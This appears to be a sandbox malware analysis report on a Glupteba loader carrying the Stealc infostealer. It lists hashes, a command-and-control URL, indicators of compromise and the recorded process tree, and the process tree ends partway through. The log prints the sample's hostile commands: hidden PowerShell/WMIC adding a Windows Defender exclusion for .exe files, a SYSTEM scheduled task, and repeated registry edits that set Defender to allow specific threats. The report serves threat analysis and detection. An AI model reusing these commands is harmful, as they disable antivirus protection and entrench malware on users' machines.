glupteba | 78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88

Analysis

max time kernel
87s
max time network
125s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
18-04-2024 22:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe
Size

3.3MB
MD5

1e00263c4dbad7dbb9cca4b918ec62be
SHA1

3de8769c5c9363eb7ad81e5327419b82b22d9b2e
SHA256

78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88
SHA512

9dee743fdbb19fab638b4a6047708e65e23e9c0c8347d15d9c31f008af8b9546aef6416838abbe09b81d92ce7b8d514de49e11939c431fb2e617299531270409
SSDEEP

49152:xXmM3+IVJiicn3HpKoQyvf7+FagF+Iw5laSMuL:KdVjnac8VU

Score

10^/10

glupteba stealc dropper loader stealer themida

Malware Config

Extracted

Family

stealc

http://185.172.128.209

Attributes

url_path
/3cd2b41cbde8fc9c.php

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 14 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4716-37-0x0000000005160000-0x0000000005A4B000-memory.dmp	family_glupteba
behavioral2/memory/4716-38-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/2088-39-0x0000000005080000-0x000000000596B000-memory.dmp	family_glupteba
behavioral2/memory/2088-43-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/4716-291-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/2088-293-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/4716-844-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/2088-856-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/4716-864-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/2088-875-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/2088-879-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/4716-877-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/316-914-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba
behavioral2/memory/3920-916-0x0000000000400000-0x0000000003009000-memory.dmp	family_glupteba

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Downloads MZ/PE file

Drops startup file 4 IoCs

Processes:

CasPol.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ITHaSn2fNutqtHvFSFb44cVb.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rn4R4OZJUhUIkkDrI1tT2RVj.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GADpfbcJCUJNQVsrX0Rg9WZa.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6bnqAatgWQRDtxtVU1uGl0zQ.bat	CasPol.exe

Executes dropped EXE 3 IoCs

Processes:

zf5jr9DDdhQj1bvtQNw4Gpck.exevaa0AZQ5oBlUsf402TW8rOEJ.exeKs5dqzZK8yhupBtJ3XsuUE3Q.exe

pid process

1772 zf5jr9DDdhQj1bvtQNw4Gpck.exe
4716 vaa0AZQ5oBlUsf402TW8rOEJ.exe
2088 Ks5dqzZK8yhupBtJ3XsuUE3Q.exe

pid	process
1772	zf5jr9DDdhQj1bvtQNw4Gpck.exe
4716	vaa0AZQ5oBlUsf402TW8rOEJ.exe
2088	Ks5dqzZK8yhupBtJ3XsuUE3Q.exe

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\gL3O98AfhmsCpD8gaad1PXlS.exe	themida
behavioral2/memory/2164-67-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp	themida
behavioral2/memory/2164-68-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp	themida
behavioral2/memory/2164-78-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp	themida
behavioral2/memory/2164-80-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp	themida
behavioral2/memory/2164-82-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp	themida
behavioral2/memory/2164-85-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp	themida
behavioral2/memory/2164-352-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp	themida

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 pastebin.com
3 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

42 ipinfo.io
37 api.myip.com
40 api.myip.com
41 ipinfo.io

flow	ioc
2	pastebin.com
3	pastebin.com

flow	ioc
42	ipinfo.io
37	api.myip.com
40	api.myip.com
41	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

Processes:

78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe

description	pid	process	target process
PID 3748 set thread context of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4872 schtasks.exe

pid	process
4872	schtasks.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exeCasPol.exe

description	pid	process
Token: SeDebugPrivilege	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe
Token: SeDebugPrivilege	2180	CasPol.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exeCasPol.exe

description	pid	process	target process
PID 3748 wrote to memory of 312	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	msbuild.exe
PID 3748 wrote to memory of 312	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	msbuild.exe
PID 3748 wrote to memory of 312	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	msbuild.exe
PID 3748 wrote to memory of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe
PID 3748 wrote to memory of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe
PID 3748 wrote to memory of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe
PID 3748 wrote to memory of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe
PID 3748 wrote to memory of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe
PID 3748 wrote to memory of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe
PID 3748 wrote to memory of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe
PID 3748 wrote to memory of 2180	3748	78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe	CasPol.exe
PID 2180 wrote to memory of 1772	2180	CasPol.exe	zf5jr9DDdhQj1bvtQNw4Gpck.exe
PID 2180 wrote to memory of 1772	2180	CasPol.exe	zf5jr9DDdhQj1bvtQNw4Gpck.exe
PID 2180 wrote to memory of 1772	2180	CasPol.exe	zf5jr9DDdhQj1bvtQNw4Gpck.exe
PID 2180 wrote to memory of 4716	2180	CasPol.exe	vaa0AZQ5oBlUsf402TW8rOEJ.exe
PID 2180 wrote to memory of 4716	2180	CasPol.exe	vaa0AZQ5oBlUsf402TW8rOEJ.exe
PID 2180 wrote to memory of 4716	2180	CasPol.exe	vaa0AZQ5oBlUsf402TW8rOEJ.exe
PID 2180 wrote to memory of 2088	2180	CasPol.exe	Ks5dqzZK8yhupBtJ3XsuUE3Q.exe
PID 2180 wrote to memory of 2088	2180	CasPol.exe	Ks5dqzZK8yhupBtJ3XsuUE3Q.exe
PID 2180 wrote to memory of 2088	2180	CasPol.exe	Ks5dqzZK8yhupBtJ3XsuUE3Q.exe

C:\Users\Admin\AppData\Local\Temp\78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe
"C:\Users\Admin\AppData\Local\Temp\78aa2a004e9732e8885518ed8b8a5fca9ad1f6a354f0593be978ea531ebf5a88.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
2⤵
PID:312

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180

C:\Users\Admin\Pictures\zf5jr9DDdhQj1bvtQNw4Gpck.exe
"C:\Users\Admin\Pictures\zf5jr9DDdhQj1bvtQNw4Gpck.exe"
3⤵
- Executes dropped EXE
PID:1772

C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe"
4⤵
PID:2276

C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
4⤵
PID:2080

C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
5⤵
PID:4704

C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
6⤵
PID:4272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
7⤵
PID:2964

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
8⤵
PID:1064

C:\Users\Admin\AppData\Local\Temp\u1d8.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1d8.1.exe"
4⤵
PID:980

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
5⤵
PID:4324

C:\Users\Admin\Pictures\vaa0AZQ5oBlUsf402TW8rOEJ.exe
"C:\Users\Admin\Pictures\vaa0AZQ5oBlUsf402TW8rOEJ.exe"
3⤵
- Executes dropped EXE
PID:4716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:2664

C:\Users\Admin\Pictures\vaa0AZQ5oBlUsf402TW8rOEJ.exe
"C:\Users\Admin\Pictures\vaa0AZQ5oBlUsf402TW8rOEJ.exe"
4⤵
PID:316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4704

C:\Users\Admin\Pictures\Ks5dqzZK8yhupBtJ3XsuUE3Q.exe
"C:\Users\Admin\Pictures\Ks5dqzZK8yhupBtJ3XsuUE3Q.exe"
3⤵
- Executes dropped EXE
PID:2088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:2432

C:\Users\Admin\Pictures\Ks5dqzZK8yhupBtJ3XsuUE3Q.exe
"C:\Users\Admin\Pictures\Ks5dqzZK8yhupBtJ3XsuUE3Q.exe"
4⤵
PID:3920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4944

C:\Users\Admin\Pictures\gL3O98AfhmsCpD8gaad1PXlS.exe
"C:\Users\Admin\Pictures\gL3O98AfhmsCpD8gaad1PXlS.exe"
3⤵
PID:2164

C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe
"C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe" --silent --allusers=0
3⤵
PID:4216

C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe
C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6e35e1d0,0x6e35e1dc,0x6e35e1e8
4⤵
PID:3960

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UnOvcSdDh4WNfquLMhVlCFPb.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UnOvcSdDh4WNfquLMhVlCFPb.exe" --version
4⤵
PID:528

C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe
"C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4216 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240418224757" --session-guid=d0f63bed-ee32-4f98-879e-95a5807bf6fe --server-tracking-blob="OGFmOTlmMTZjY2IxZjBkODJmNTA2NjgzNWE4NjY4ZTA3NDA2OGFkNjUwZjU2NzcyNTViNGMzYjgwZmVjY2FhYjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNDgwNDY5LjA0OTAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNTA4NTJhN2MtODZjYi00ZmZlLThkNTQtOTM3ZmYyMDU3MGIwIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7404000000000000
4⤵
PID:1360

C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe
C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x6d55e1d0,0x6d55e1dc,0x6d55e1e8
5⤵
PID:3556

C:\Users\Admin\Pictures\0CfbmjmXHVhhdSsidg7uqAeb.exe
"C:\Users\Admin\Pictures\0CfbmjmXHVhhdSsidg7uqAeb.exe"
3⤵
PID:4616

C:\Users\Admin\AppData\Local\Temp\7zS9CCC.tmp\Install.exe
.\Install.exe /sQwdidHh "385118" /S
4⤵
PID:1392

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:4296

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:3644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:2452

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:1508

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\GGPEyvj.exe\" em /yusite_idxoX 385118 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:4872

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2388

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\GGPEyvj.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\GGPEyvj.exe em /yusite_idxoX 385118 /S
1⤵
PID:2044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:4048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:1856

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:4268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:2584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:3732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:224

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:1920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:2928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:2552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4136

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3588

C:\Windows\SysWOW64\reg.exe
